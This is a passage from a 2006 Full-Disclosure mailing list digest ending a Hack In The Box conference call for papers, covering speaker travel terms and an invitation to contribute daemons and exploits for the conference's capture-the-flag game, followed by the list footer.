* Technical requirements (video, internet, wireless, audio, etc.)
Each non-resident speaker will receive accommodation for 3 nights at The
Westin Kuala Lumpur. For each non-resident speaker, HITB will cover
travel expenses (through our airline partner, Malaysia Airlines) up to
USD 1,000.00.
HITBSecConf2006 CTF Daemons/Flags
As part of our annual conference, HITB organizes an attack and defense
"hack-game" commonly referred to as *Capture The Flag* or CTF. As part
of our continued efforts to improve on the game and raise the bar each
year, we are inviting speakers to contribute a daemon and exploit for
this years CTF competition. For further details on the submission
process, kindly e-mail dinesh -at- hackinthebox.org or ctfinfo -at-
hackinthebox.org.
On behalf of The HITB Team, we thank you and look forward to receiving
your submissions! See you guys in September!
HITBSecConf2006 - Malaysia: Deep-Knowledge Network Security
http://conference.hackinthebox.org/hitbsecconf2006kl/
http://conference.hitb.org/hitbsecconf2006kl/
------------------------------
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
End of Full-Disclosure Digest, Vol 13, Issue 8
**********************************************
Powered by blists - more mailing lists